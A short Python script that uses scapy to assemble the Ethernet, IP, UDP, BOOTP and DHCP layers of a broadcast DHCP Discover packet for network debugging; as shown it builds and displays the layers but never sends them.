""" A very basic script to send a DHCP Discover message. Capture the packages to see what's wrong. """ import scapy from scapy.sendrecv import sendp, sniff from scapy.all import DHCP, ARP, BOOTP, Ether, UDP, TCP, IP # data link layer ethernet = Ether() ethernet.show() ethernet.dst = "ff:ff:ff:ff:ff:ff" # network layer ip = IP() ip.show() ip.dst = "255.255.255.255" # transport layer udp = UDP() udp.show() udp.sport = 68 udp.dport = 67 # application layer bootp = BOOTP() bootp.show() bootp.flags = 1 dhcp = DHCP() dhcp.show()